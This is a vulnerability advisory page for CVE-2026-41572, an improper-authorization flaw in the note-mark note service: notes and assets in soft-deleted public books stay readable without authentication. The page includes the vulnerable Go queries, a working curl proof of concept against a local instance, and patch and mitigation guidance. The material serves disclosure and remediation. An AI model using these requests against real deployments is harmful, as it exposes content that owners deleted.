Skip to main content

note-mark CVE-2026-41572

| EUVDEUVD-2026-27053 MEDIUM
Improper Authorization (CWE-285)
2026-04-25 https://github.com/enchant97/note-mark GHSA-3gr9-485j-v4xf
5.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

4
Analysis Generated
Apr 26, 2026 - 00:00 vuln.today
Analysis Generated
Apr 25, 2026 - 23:45 vuln.today
Patch released
Apr 25, 2026 - 23:45 nvd
Patch available
CVE Published
Apr 25, 2026 - 23:40 nvd
MEDIUM 5.3

DescriptionGitHub Advisory

Summary

After a note-mark owner soft-deletes a public book, its notes and uploaded assets stay readable at /api/notes/{id}, /api/notes/{id}/content, the slug URL, and the asset endpoints. Unauthenticated callers who hold the note ID or the slug path retain access. GORM's soft-delete scope does not reach the raw JOIN books ... clauses used by the note and asset queries.

Details

DELETE /api/books/{bookID} sets books.deleted_at to the current time. The book-level endpoint starts returning 404, which matches the owner's expectation that the book is gone. The note service and asset service query notes with a raw join that does not filter books.deleted_at IS NULL:

go
// backend/services/notes.go:91-98 (GetNoteByID)
func (s NotesService) GetNoteByID(currentUserID *uuid.UUID, noteID uuid.UUID) (db.Note, error) {
    var note db.Note
    return note, dbErrorToServiceError(db.DB.
        Preload("Book").
        Joins("JOIN books ON books.id = notes.book_id").
        Where("owner_id = ? OR is_public = ?", currentUserID, true).
        First(&note, "notes.id = ?", noteID).Error)
}

GORM applies its soft-delete scope to the primary model of a query (here, notes) and to implicit Joins("Book") association clauses. It does not rewrite raw SQL passed to Joins. The soft-deleted book row keeps is_public = true, so the WHERE owner_id = ? OR is_public = ? clause still evaluates true for any caller on a book that was public at deletion time. For an unauthenticated caller (currentUserID = nil), owner_id = NULL fails but is_public = true passes, so the note query returns the row.

note-mark has a restore flow at PUT /api/notes/{noteID}/restore (backend/services/notes.go:232-262) that un-deletes the note and the parent book in one transaction. Owner access to soft-deleted notes is deliberate for that path; the comment at line 253 spells out the intent. The bug is that is_public = true survives the deletion, so unauthenticated callers keep access the owner chose to revoke.

The same raw-join pattern repeats at 9 more call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and 4 call sites in backend/services/assets.go (lines 29, 73, 106, 143). Every public endpoint that reads a note or an asset inherits the bug.

Proof of Concept

Tested against note-mark v0.19.2.

Step 1: Start note-mark.

bash
docker run -d --name note-mark-poc -p 8088:8080 \
  ghcr.io/enchant97/note-mark-backend:0.19.2

Step 2: Alice signs up and logs in.

bash
curl -X POST http://localhost:8088/api/users \
  -H 'Content-Type: application/json' \
  -d '{"username":"alice","password":"Alicepass123!","name":"Alice"}'

curl -c alice.cookies -X POST http://localhost:8088/api/auth/token \
  -H 'Content-Type: application/json' \
  -d '{"grant_type":"password","username":"alice","password":"Alicepass123!"}'

Step 3: Alice creates a public book and adds a note with content. Save the IDs from each response.

bash
curl -b alice.cookies -X POST http://localhost:8088/api/books \
  -H 'Content-Type: application/json' \
  -d '{"name":"Alice Public Book","slug":"public-book","isPublic":true}'
# {"id":"<BOOK_ID>", ...}

curl -b alice.cookies -X POST http://localhost:8088/api/books/<BOOK_ID>/notes \
  -H 'Content-Type: application/json' \
  -d '{"name":"Secret Note","slug":"secret-note"}'
# {"id":"<NOTE_ID>", ...}

curl -b alice.cookies -X PUT http://localhost:8088/api/notes/<NOTE_ID>/content \
  -H 'Content-Type: text/plain' \
  --data 'This is Alice secret note content.'

Step 4: Bob (no cookie) reads the note while the book is still live. This is expected for a public book.

bash
curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

Step 5: Alice soft-deletes the book.

bash
curl -b alice.cookies -X DELETE http://localhost:8088/api/books/<BOOK_ID>
# HTTP/1.1 204 No Content

Step 6: The book endpoint 404s. The note endpoints still serve Alice's content to Bob.

bash
curl -w "\n%{http_code}\n" http://localhost:8088/api/books/<BOOK_ID>
# 404

curl -w "\n%{http_code}\n" http://localhost:8088/api/notes/<NOTE_ID>
# {"id":"<NOTE_ID>","name":"Secret Note", ...}
# 200

curl http://localhost:8088/api/notes/<NOTE_ID>/content
# This is Alice secret note content.

curl http://localhost:8088/api/slug/alice/books/public-book/notes/secret-note
# {"id":"<NOTE_ID>","name":"Secret Note", ...}

A companion script that drives Steps 1-6 ships at pocs/poc_005_bac_soft_deleted_book.sh.

Impact

Any owner who soft-deletes a public book expecting the content to drop off the internet is wrong. Notes, markdown content, and uploaded assets stay readable for every unauthenticated caller who knows the note ID or the slug path. Slugs are human-readable and change hands in documentation, notes, and bug trackers. The leak covers every public note and asset endpoint, not a single handler. Private books are not affected because is_public = false and owner_id = NULL both fail the visibility check for non-owners.

Recommended Fix

Add a soft-delete filter to the visibility clause on every raw Joins("JOIN books ..."). Keep the owner's access intact so the restore flow at PUT /api/notes/{id}/restore continues to work:

go
// backend/services/notes.go:91-98 (GetNoteByID)
return note, dbErrorToServiceError(db.DB.
    Preload("Book").
    Joins("JOIN books ON books.id = notes.book_id").
    Where("(books.deleted_at IS NULL OR books.owner_id = ?)", currentUserID).
    Where("owner_id = ? OR is_public = ?", currentUserID, true).
    First(&note, "notes.id = ?", noteID).Error)

The same transform applies to each of the 13 call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and backend/services/assets.go (lines 29, 73, 106, 143). backend/cli/clean.go:31 uses the same join pattern but is a maintenance CLI and does not need the fix.

--- *Found by aisafe.io*

AnalysisAI

Soft-deleted public books in note-mark allow unauthenticated access to notes and assets via direct API endpoints and slug URLs. When a note-mark owner deletes a public book, the GORM soft-delete mechanism fails to filter raw SQL JOIN clauses in note and asset queries, leaving notes and uploaded content readable to any caller who knows the note ID or slug path. CVSS 5.3 (network, low complexity, no authentication required) reflects confidentiality impact; patch is available from vendor.

Technical ContextAI

note-mark is a Go-based note management service using GORM (Go Object-Relational Mapping) for database operations. The vulnerability stems from GORM's soft-delete scope behavior: GORM automatically applies soft-delete filters (WHERE deleted_at IS NULL) to primary model queries and implicit association joins like Joins("Book"), but does NOT rewrite raw SQL passed to Joins() clauses. The affected services (NotesService and AssetService) construct queries with raw JOIN clauses like Joins("JOIN books ON books.id = notes.book_id") that bypass GORM's soft-delete filtering. When a book is soft-deleted (deleted_at timestamp is set), the book row persists in the database with is_public still TRUE. Unauthenticated queries that check owner_id = ? OR is_public = true still evaluate true because is_public is not cleared on deletion, allowing public access to orphaned notes and assets. CWE-285 (Improper Authorization) describes this root cause: the visibility check fails to account for the deleted state of the parent resource.

RemediationAI

Vendor-released patch: commit d1bf845a2a2df01e2eca6f556287db4ec6f773cf. Apply the fix by adding a soft-delete filter to the visibility WHERE clause on all 13 raw JOIN call sites in backend/services/notes.go (lines 79, 95, 107, 129, 143, 174, 206, 237, 276) and backend/services/assets.go (lines 29, 73, 106, 143). The recommended transform adds (books.deleted_at IS NULL OR books.owner_id = ?) to preserve owner access for the restore flow while blocking unauthenticated readers: modify the WHERE clause from Where("owner_id = ? OR is_public = ?", currentUserID, true) to Where("(books.deleted_at IS NULL OR books.owner_id = ?)", currentUserID).Where("owner_id = ? OR is_public = ?", currentUserID, true). Deploy the patched version immediately to all running instances. For interim protection on unpatched instances, restrict network access to note and asset API endpoints to authenticated users only via reverse proxy or firewall rules; this breaks public sharing but prevents unauthenticated content leakage until patching. No workarounds exist that preserve public-sharing functionality while blocking the exploit without code changes. See https://github.com/enchant97/note-mark/commit/d1bf845a2a2df01e2eca6f556287db4ec6f773cf for patch details.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-41572 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy